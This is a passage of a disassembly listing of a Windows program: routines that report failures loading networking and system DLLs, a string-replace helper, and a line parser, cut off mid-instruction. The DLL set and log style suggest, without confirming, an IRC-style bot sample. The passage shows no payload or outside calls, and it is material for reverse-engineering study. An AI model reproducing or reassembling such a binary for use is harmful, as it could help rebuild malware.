; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40525A: ; CODE XREF: sub_40468E + B4E�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433654, eax
loc_405265: ; CODE XREF: sub_40468E + BA4�j
; sub_40468E + BAC�j ...
mov dword_433650, 1
loc_40526F: ; CODE XREF: sub_40468E + BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_40468E endp
########################## SUBROUTINE ##########################
sub_405277 proc near ; CODE XREF: sub_4078FA + 424B�p
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ ebp + arg_4 ]
push esi
xor esi, esi
cmp dword_4335F0, esi
push edi
mov edi, [ ebp + arg_8 ]
jz short loc_4052BF
push dword_4335F4
lea eax, [ ebp + var_200 ]
push offset aKernel32_dllFa ; \"Kernel32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4052BF: ; CODE XREF: sub_405277 + 1A�j
cmp dword_4335F8, esi
jz short loc_4052F3
push dword_4335FC
lea eax, [ ebp + var_200 ]
push offset aUser32_dllFail ; \"User32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4052F3: ; CODE XREF: sub_405277 + 4E�j
cmp dword_433600, esi
jz short loc_405327
push dword_433604
lea eax, [ ebp + var_200 ]
push offset aAdvapi32_dllFa ; \"Advapi32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_405327: ; CODE XREF: sub_405277 + 82�j
cmp dword_433608, esi
jz short loc_40535B
push dword_43360C
lea eax, [ ebp + var_200 ]
push offset aGdi32_dllFaile ; \"Gdi32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_40535B: ; CODE XREF: sub_405277 + B6�j
cmp dword_433610, esi
jz short loc_40538F
push dword_433614
lea eax, [ ebp + var_200 ]
push offset aWs2_32_dllFail ; \"Ws2_32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_40538F: ; CODE XREF: sub_405277 + EA�j
cmp dword_433618, esi
jz short loc_4053C3
push dword_43361C
lea eax, [ ebp + var_200 ]
push offset aWininet_dllFai ; \"Wininet.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4053C3: ; CODE XREF: sub_405277 + 11E�j
cmp dword_433620, esi
jz short loc_4053F7
push dword_433624
lea eax, [ ebp + var_200 ]
push offset aIcmp_dllFailed ; \"Icmp.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4053F7: ; CODE XREF: sub_405277 + 152�j
cmp dword_433628, esi
jz short loc_40542B
push dword_43362C
lea eax, [ ebp + var_200 ]
push offset aNetapi32_dllFa ; \"Netapi32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_40542B: ; CODE XREF: sub_405277 + 186�j
cmp dword_433630, esi
jz short loc_40545F
push dword_433634
lea eax, [ ebp + var_200 ]
push offset aDnsapi_dllFail ; \"Dnsapi.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_40545F: ; CODE XREF: sub_405277 + 1BA�j
cmp dword_433638, esi
jz short loc_405493
push dword_43363C
lea eax, [ ebp + var_200 ]
push offset aIphlpapi_dllFa ; \"Iphlpapi.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_405493: ; CODE XREF: sub_405277 + 1EE�j
cmp dword_433640, esi
jz short loc_4054C7
push dword_433644
lea eax, [ ebp + var_200 ]
push offset aMpr32_dllFaile ; \"Mpr32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4054C7: ; CODE XREF: sub_405277 + 222�j
cmp dword_433648, esi
jz short loc_4054FB
push dword_43364C
lea eax, [ ebp + var_200 ]
push offset aShell32_dllFai ; \"Shell32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_4054FB: ; CODE XREF: sub_405277 + 256�j
cmp dword_433650, esi
jz short loc_40552F
push dword_433654
lea eax, [ ebp + var_200 ]
push offset aOdbc32_dllFail ; \"Odbc32.dll failed. <%d>\"
push eax
call sub_412BB5
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 20h
loc_40552F: ; CODE XREF: sub_405277 + 28A�j
lea eax, [ ebp + var_200 ]
push offset aMainDllTestCom ; \"[ MAIN ]: DLL test complete.\"
push eax
call sub_412BB5
cmp [ ebp + arg_C ], esi
pop ecx
pop ecx
jnz short loc_40555C
push esi
push edi
lea eax, [ ebp + var_200 ]
push eax
push ebx
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 14h
loc_40555C: ; CODE XREF: sub_405277 + 2CE�j
lea eax, [ ebp + var_200 ]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_405277 endp
########################## SUBROUTINE ##########################
sub_40556E proc near ; CODE XREF: sub_4078FA + A6A�p
; sub_4078FA + A9D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ ebp + arg_0 ]
xor esi, esi
cmp edi, esi
jz loc_405645
mov eax, [ ebp + arg_4 ]
cmp eax, esi
jz loc_405645
cmp [ ebp + arg_8 ], esi
jz loc_405645
cmp byte ptr [ eax ], 0
jz loc_405645
push ebx
push edi
call sub_41E867
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_405640
push [ ebp + arg_4 ]
push edi
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405639
sub eax, edi
push eax
push edi
push ebx
call sub_412C40
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [ eax + esi ], 0
mov eax, [ ebp + arg_8 ]
lea ecx, [ eax + 1 ]
loc_4055DB: ; CODE XREF: sub_40556E + 72�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_4055DB
sub eax, ecx
push eax
push [ ebp + arg_8 ]
push ebx
call sub_412A80
mov eax, [ ebp + arg_4 ]
add esp, 0Ch
lea ecx, [ eax + 1 ]
loc_4055F7: ; CODE XREF: sub_40556E + 8E�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_4055F7
sub eax, ecx
add eax, esi
mov esi, eax
loc_405604: ; CODE XREF: sub_40556E + 9B�j
mov cl, [ eax ]
inc eax
test cl, cl
jnz short loc_405604
mov edi, ebx
sub eax, esi
dec edi
loc_405610: ; CODE XREF: sub_40556E + A8�j
mov cl, [ edi + 1 ]
inc edi
test cl, cl
jnz short loc_405610
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ ebp + arg_0 ]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40562F: ; CODE XREF: sub_40556E + C9�j
mov cl, [ eax ]
mov [ edx + eax ], cl
inc eax
test cl, cl
jnz short loc_40562F
loc_405639: ; CODE XREF: sub_40556E + 50�j
push ebx
call sub_412FE4
pop ecx
loc_405640: ; CODE XREF: sub_40556E + 3B�j
mov eax, esi
pop ebx
jmp short loc_405647
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_405645: ; CODE XREF: sub_40556E + C�j
; sub_40556E + 17�j ...
xor eax, eax
loc_405647: ; CODE XREF: sub_40556E + D5�j
pop edi
pop esi
pop ebp
retn
sub_40556E endp
########################## SUBROUTINE ##########################
sub_40564B proc near ; CODE XREF: sub_40751F + C2�p
var_7D0 = dword ptr - 7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ ebp + var_7D0 ]
rep stosd
mov ecx, [ ebp + arg_0 ]
mov eax, ecx
lea esi, [ eax + 1 ]
loc_40566E: ; CODE XREF: sub_40564B + 28�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_40566E
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_405685
or eax, 0FFFFFFFFh
jmp short loc_4056E5
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_405685: ; CODE XREF: sub_40564B + 33�j
xor edx, edx
test edi, edi
mov [ ebp + var_7D0 ], ecx
jle short loc_4056A5
loc_405691: ; CODE XREF: sub_40564B + 58�j
mov al, [ edx + ecx ]
cmp al, 0Ah
jz short loc_40569C
cmp al, 0Dh
jnz short loc_4056A0
loc_40569C: ; CODE XREF: sub_40564B + 4B�j
and byte ptr [ edx +